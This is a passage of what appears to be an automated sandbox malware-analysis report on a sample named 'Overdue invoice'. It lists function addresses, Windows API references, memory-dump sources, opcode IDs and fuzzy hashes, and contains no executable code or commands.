                                                                          Function 064E78DE Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 2c03e0b47bd9417c74e7b77e0860a6917dedee03b4a28363f13d3301cd4f4a93
                                                                          • Instruction ID: 0b67f1d2e310089af8382d9fe31184587a988bbd7497e08bee02f5157bc6da7c
                                                                          • Opcode Fuzzy Hash: 2c03e0b47bd9417c74e7b77e0860a6917dedee03b4a28363f13d3301cd4f4a93
                                                                          • Instruction Fuzzy Hash: 60C1EA39902398CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7925 Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 08acc68067214f27af25a5925f8c1f980ddea7392834d7f6b0b1f2f531f7e8aa
                                                                          • Instruction ID: e782e356c54d270934099c9f43feb8089ad7c836fc71bf1d4065fb9788bc0ec4
                                                                          • Opcode Fuzzy Hash: 08acc68067214f27af25a5925f8c1f980ddea7392834d7f6b0b1f2f531f7e8aa
                                                                          • Instruction Fuzzy Hash: C7C1FB39902398CFDBA5DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E796C Relevance: 1.7, APIs: 1, Instructions: 217COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 4b05e010114e6eb6029a0846ad7eb4910691803b72dc5aaa71074447de3dc527
                                                                          • Instruction ID: 58cffb08a98221c171af0e14241c5f8706460d5c13ae1a18308b9613bdd7cd7c
                                                                          • Opcode Fuzzy Hash: 4b05e010114e6eb6029a0846ad7eb4910691803b72dc5aaa71074447de3dc527
                                                                          • Instruction Fuzzy Hash: 3FB1DB39902298CFDB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E79B3 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 75a525129e582614bab745b1fbb701d7a34e5e5a0ba9683e039d2c1c7b8a6b46
                                                                          • Instruction ID: 6742b6077dfb6b2f598abca30dcdbb7bee27a126491d0f473e26dabf8f92686d
                                                                          • Opcode Fuzzy Hash: 75a525129e582614bab745b1fbb701d7a34e5e5a0ba9683e039d2c1c7b8a6b46
                                                                          • Instruction Fuzzy Hash: 49B1DB39902298CFDB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E79FA Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: b7602deffad2f962d21fb3090ca91d6619d597a636a340881c81721af0182918
                                                                          • Instruction ID: 8c44da29e3036e3d337b4faf8de1ef008e5120f0c1ccc40dcd21600a6fc10f47
                                                                          • Opcode Fuzzy Hash: b7602deffad2f962d21fb3090ca91d6619d597a636a340881c81721af0182918
                                                                          • Instruction Fuzzy Hash: E8B1FB39906298CFCB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7A41 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 743183450e328093c5d915d26a25da6073b0e9114efba53c4ffb9739e8c7b929
                                                                          • Instruction ID: 8dc574d384892803c44f7eba71e9aa6061edf1709f8eeb8bdf31da681706a06a
                                                                          • Opcode Fuzzy Hash: 743183450e328093c5d915d26a25da6073b0e9114efba53c4ffb9739e8c7b929
                                                                          • Instruction Fuzzy Hash: D9A1FC39902298CFDBA5DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7A7F Relevance: 1.7, APIs: 1, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: ead2421514d0a6ae2662f0849d0860f392944106b5cfec8f18f240688f579bd0
                                                                          • Instruction ID: f9992a92fd5e541494a816e422ad7aa1a71594ba5ace4a190579ed2829e2c97b
                                                                          • Opcode Fuzzy Hash: ead2421514d0a6ae2662f0849d0860f392944106b5cfec8f18f240688f579bd0
                                                                          • Instruction Fuzzy Hash: A5A1EB39906298CFCB65DF30D8886A9B7B2FF4570AF6041DAE90AA7340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7AC6 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 02473c793d59bcc3f68d589af497a600810c652a62d552404393e494c45f3a35
                                                                          • Instruction ID: 63a3f7368a3fe5c01b8b7a2b15a8785cf3e752220621c6ee94f3e62dbeb43d2e
                                                                          • Opcode Fuzzy Hash: 02473c793d59bcc3f68d589af497a600810c652a62d552404393e494c45f3a35
                                                                          • Instruction Fuzzy Hash: 9D91EB39906298CFCB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7B04 Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: bb2c5165963bc4c8a4408f38673429edb0b795cd3fd6a07936d023ce8fb432ef
                                                                          • Instruction ID: 0ae658f5741127b1acee34215d4df58a0a8156d3a44e4942b90d60d6a04e6327
                                                                          • Opcode Fuzzy Hash: bb2c5165963bc4c8a4408f38673429edb0b795cd3fd6a07936d023ce8fb432ef
                                                                          • Instruction Fuzzy Hash: F091EB39902258CFCB65DF30D8886A9B7B2FF4570AF6041DAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7B4B Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: e8c0a1e3a09034775605694901fcee5d99148e52fd3fc8ba1f59301de34f9e47
                                                                          • Instruction ID: 158932f9d7cca61283500e4f0d9549d57e8e4ebee3d1c5309f67e5102cdc4a35
                                                                          • Opcode Fuzzy Hash: e8c0a1e3a09034775605694901fcee5d99148e52fd3fc8ba1f59301de34f9e47
                                                                          • Instruction Fuzzy Hash: B191EA39902358CFCBA5DF20D8886A9B7B2FF4571AF6041DAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7B95 Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: d3de3a8f905579bd4cb35078c14b8eadb7e1c6ecb74dd939243538ba134e0b99
                                                                          • Instruction ID: c2846835973d2de58be98b0754afb780430898ba0ca5c2eb7da6d0cfedad650f
                                                                          • Opcode Fuzzy Hash: d3de3a8f905579bd4cb35078c14b8eadb7e1c6ecb74dd939243538ba134e0b99
                                                                          • Instruction Fuzzy Hash: 3181EA39906358CFCBA5DF20D8886A9B7B2FF4570AF6041EAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7BDF Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: fa196bf65d9adc71cb32f1618fe07180963ba2622cc9686f0d1acdbef3b2eb91
                                                                          • Instruction ID: 1b4f7f76c362bb489fb03c36f686d37ee3fd3384ae7fbb4035c814cbe2c76d0d
                                                                          • Opcode Fuzzy Hash: fa196bf65d9adc71cb32f1618fe07180963ba2622cc9686f0d1acdbef3b2eb91
                                                                          • Instruction Fuzzy Hash: 8A810B39902258CFCB65DF30D8886A9B7B2FF4570AF6041EAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7C29 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 064300cf13e4e651810eda2009a1a64fc82e1e94af28f45be7af8af56c514f08
                                                                          • Instruction ID: 186fbf0e8595b0006ae55ced6b8369f391049c56b52f9aa69d470779cd4683f1
                                                                          • Opcode Fuzzy Hash: 064300cf13e4e651810eda2009a1a64fc82e1e94af28f45be7af8af56c514f08
                                                                          • Instruction Fuzzy Hash: 1C71EC39906258CFCBA5EF30D8886A9B7B2FF4570AF6041EAE90A57340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7C67 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 6553eeb147aa19833b9ffe0f317fd2c497649461c95b0cd53e7303b1adba1055
                                                                          • Instruction ID: cff15a99e44bb963df990a04880650802d072a1473abdb408eae77921f2e3cf8
                                                                          • Opcode Fuzzy Hash: 6553eeb147aa19833b9ffe0f317fd2c497649461c95b0cd53e7303b1adba1055
                                                                          • Instruction Fuzzy Hash: 9771DB39902258CFDBA5DF30D8886A9B7B2FF4570AF6041DAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7CB1 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 2d5768fbab17051bbf0180070cb82c9694cbac03a01c1cc9d4b6340d41512355
                                                                          • Instruction ID: a316e6f1c5a3c18365cc93a249dc394460463b56188f25763033f0fd1c309a10
                                                                          • Opcode Fuzzy Hash: 2d5768fbab17051bbf0180070cb82c9694cbac03a01c1cc9d4b6340d41512355
                                                                          • Instruction Fuzzy Hash: 9561DB39902258CFDB65EF30D8886A9B7B2FF4570AF6041EAE90A97340DB355D82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7CEF Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 4dd30fb118a54d22bfe1c67c4211bbb7b1c69d2924539717b125694bec9610e6
                                                                          • Instruction ID: 14bd7c2c85d96f377dab8f51d353f5b2dc60545c3a0c6c8609060a41e6331a18
                                                                          • Opcode Fuzzy Hash: 4dd30fb118a54d22bfe1c67c4211bbb7b1c69d2924539717b125694bec9610e6
                                                                          • Instruction Fuzzy Hash: 0951EB39902258CFCB65DF70D8886A9B7B2FF4570AF6041DAE50A97340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7D39 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 1cf4891e72f7ed3cbfdbe6afe97ce5c398b185447e4fb2277fccf94f4454331d
                                                                          • Instruction ID: 4a203a5eae2605e8f79cfd24a03f40fc4086cab9eb4fad3ccd97d2add73ffe4b
                                                                          • Opcode Fuzzy Hash: 1cf4891e72f7ed3cbfdbe6afe97ce5c398b185447e4fb2277fccf94f4454331d
                                                                          • Instruction Fuzzy Hash: 2451EB39902258CFCBA5DF20D8886A9B7B2FF4670AF6041DAD90E97350DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7D83 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 7d5d0e582f2cc15b79dbf99a943810ca681eb172843dced72c871c66435240bb
                                                                          • Instruction ID: 38fa26599c7556b65a639397311433509f18fec3d33e0f8a11bfa1d9d86ae038
                                                                          • Opcode Fuzzy Hash: 7d5d0e582f2cc15b79dbf99a943810ca681eb172843dced72c871c66435240bb
                                                                          • Instruction Fuzzy Hash: FE51FA39902258CFCBA5DF20D8886A9B7B2FF4570AF6041EAE50A97350DF355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7DC1 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: e1f47741d3a611c15ee668b2ab58ec1f57923517f6f69207af35585cc99b8a3d
                                                                          • Instruction ID: d8364d3ddbfc779c6f36b39338a8a6a968cfb1890dcfb5e20cb545da6b9fcad3
                                                                          • Opcode Fuzzy Hash: e1f47741d3a611c15ee668b2ab58ec1f57923517f6f69207af35585cc99b8a3d
                                                                          • Instruction Fuzzy Hash: 6151FA39902268CFCB65DF20D8886A9B7B2FF4570AF6041EAE90EA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7E0B Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 6ffd6213d5c842eddfec40c9bc78e5f384f145e0992dd5e69a135bea29e7352f
                                                                          • Instruction ID: 5e6c8a811752c9ec26c3f31e3ca80516da2efe77a3c26eefa06fa137d268cb7d
                                                                          • Opcode Fuzzy Hash: 6ffd6213d5c842eddfec40c9bc78e5f384f145e0992dd5e69a135bea29e7352f
                                                                          • Instruction Fuzzy Hash: D151EA39902268CFCB65DF20D8886A9B7B2FF4670AF6041EAE90A97350DF355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E63D9 Relevance: 1.6, APIs: 1, Instructions: 96fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 064E64A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: a0bdc88badf784d6cce5c2ff229a4a29040b4b6b11a26c30c34793b3fae00e97
                                                                          • Instruction ID: ab58ee6b8b8cbaa4d0855b49e8484d5e88d1f7450b806c4375978259d3ef1d7a
                                                                          • Opcode Fuzzy Hash: a0bdc88badf784d6cce5c2ff229a4a29040b4b6b11a26c30c34793b3fae00e97
                                                                          • Instruction Fuzzy Hash: 0631CE70D046999FCB11CFAAD800BDEBBB4EF4A220F0581ABE444A7341D738A945CFE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7E55 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 8d32a928946a80b5cd8eaa4393e3c33f4516704ff64be04b5f6242f28ac84fb5
                                                                          • Instruction ID: 37ba82754623813778eb33ccd917a69cb9952043bb35b7765e45506d965bab73
                                                                          • Opcode Fuzzy Hash: 8d32a928946a80b5cd8eaa4393e3c33f4516704ff64be04b5f6242f28ac84fb5
                                                                          • Instruction Fuzzy Hash: D541EC39902268CFCB65DF20D8886A9B7B2FF4670AF6041EAD50AA7340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016DC905 Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(?), ref: 016DC9DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.521039244.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_16d0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: a3f742ebd6041634c74543c2f3dd15fa66a53bc4494ca42cbf4c24ba13e92c25
                                                                          • Instruction ID: 4dcedd2f4a4bbc72535e59a5ba4209434b6f0997621e6a5a81acdd72e4ac7995
                                                                          • Opcode Fuzzy Hash: a3f742ebd6041634c74543c2f3dd15fa66a53bc4494ca42cbf4c24ba13e92c25
                                                                          • Instruction Fuzzy Hash: F53103B1D042599FDB14CFA9C885BAEBFB1BF48314F14812EE856AB380D7749446CF92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016D9C7C Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(?), ref: 016DC9DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.521039244.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_16d0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 46984ac72839a1627cc5be353703cc824296fcb56367a56b7c93464d8935a8a0
                                                                          • Instruction ID: 00168835631f3873fbc433d8c320fc91d075a8b574108d02142e0199cb88182c
                                                                          • Opcode Fuzzy Hash: 46984ac72839a1627cc5be353703cc824296fcb56367a56b7c93464d8935a8a0
                                                                          • Instruction Fuzzy Hash: 1D3134B1D0025D8FDB14CFA9C885BAEBBF1BB48314F14812EE816AB380D7749442CF92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7E9F Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 7b0f2acbe74ba18a0bd3159a6f07c750d0393cb81ba0057b81e3393df5a6e8cf
                                                                          • Instruction ID: 8bdaf95823ad67860ef83dd6a2a0f2d0bdcaf331bca41c600acf8ef36d95f138
                                                                          • Opcode Fuzzy Hash: 7b0f2acbe74ba18a0bd3159a6f07c750d0393cb81ba0057b81e3393df5a6e8cf
                                                                          • Instruction Fuzzy Hash: 7041EC35902268CFCB65DF20D8886A9B7B2FF4630AF6041EAE50A97340DF355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7EE9 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 5cd360c3bce1bb0dc5c95d8ce7e924bfe1544a8479b9f85b9e7499160d5d9761
